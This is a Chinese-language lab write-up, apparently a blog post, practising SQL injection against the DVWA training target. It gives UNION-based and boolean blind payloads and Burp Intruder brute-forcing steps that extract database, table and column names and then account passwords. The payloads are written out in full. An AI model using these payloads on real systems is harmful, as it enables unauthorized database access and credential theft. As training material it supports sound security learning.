DVWA靶机练习

DVWA靶机练习

一、sql语句注入

1、判断注入点,首先分别输入1’ and ‘1’=‘1和1’ and ‘1’='2

在这里插入图片描述
在这里插入图片描述
返回结果不同,那么可以确定注入点为整型。

2、使用order by推断字段数,即表中列的数量

输入1’ order by 2#,结果输出正常,说明只有2列字段
在这里插入图片描述
输入1’ order by 3#,报错,说明只有2列字段
在这里插入图片描述

3、使用union,确认显示位,即会显示的字段

输入1’ union select 1,2 #
在这里插入图片描述

4、获取数据库名

在注入点输入1’ union select user(),database() #,返回如下图,获取数据库用户名及数据库名dvwa
在这里插入图片描述

5、获取当前数据库中的表名

1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#,发现有两个表分别为:guestbook,users
在这里插入图片描述

6、获取数据库表中的所有字段名

1’ union select group_concat(column_name),database() from information_schema.columns where table_schema = database() #
在这里插入图片描述
1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=‘dvwa’#
在这里插入图片描述
1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘guestbook’ and table_schema=‘dvwa’#
在这里插入图片描述

二、SQL布尔型盲注入的原理与注入攻击

1、判断bool盲注是否存在

①1’ and if(1=1,1,0) #,页面返回正常,这个语句实际上是 1’ and 1,真 and 真,结果为真,1 是存在记录的。所以返回正确页面。
在这里插入图片描述
②1’ and if(1=2,1,0) #页面返回错误,这个语句就是 1’ and 0,真 and 假,结果为假,整个 SQL 的值也是 0,所以没有记录,返回错误页面。
在这里插入图片描述

2、判断数据库长度

①1’ and if(length(database())=4,1,0) #
在这里插入图片描述
②1’ and if(length(database())=5,1,0) #

在这里插入图片描述
说明库名的长度为4

3、获取数据库信息

①使用SUBSTRING函数
select SUBSTRING(DATABASE(),1,1);
select if(SUBSTRING(DATABASE(),1,1)=‘d’,1,0);
在这里插入图片描述

4、使用burp抓包爆破

①输入1’ and if(substring(database(),1,1)=‘d’,1,0) #,查看burp数据包
在这里插入图片描述
在这里插入图片描述
②发送到intruder模块
在这里插入图片描述

在这里插入图片描述
③进行爆破
在这里插入图片描述
拼接字符得到库名 dvwa

5、获取表名

5.1获取第一张表
①使用burp抓包,语句 1’ and if(substring((select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),1,1)=‘g’,1,0) #
在这里插入图片描述
在这里插入图片描述
②发送到intruder模块
在这里插入图片描述
③添加字典,进行爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
第一张表表名为guestbook
5.2根据爆第一张表的步骤,来爆破第二张表
在这里插入图片描述
第二张表表名为users

6、获取字段名

①抓包
1’and if(substring((select COLUMN_NAME from information_schema.COLUMNS where
TABLE_NAME=‘users’ and TABLE_SCHEMA=database() limit 0,1),1,1)=‘u’,1,0) #
在这里插入图片描述
在这里插入图片描述
②添加载荷、字典
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
③获取user表的字段
在这里插入图片描述

7、获取账号和密码

①判断查询的账号和密码长度,burp抓包
1’ and if((SELECT LENGTH(CONCAT(user,0x3a,PASSWORD)) from users limit
0,1)=40,1,0) #
在这里插入图片描述
②判断字符长度
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
长度为38
③获取账号密码
1’ and if(substring((select CONCAT(user,0x3a,PASSWORD) from users limit
0,1),1,1)=‘a’,1,0)#
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
进行爆破
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值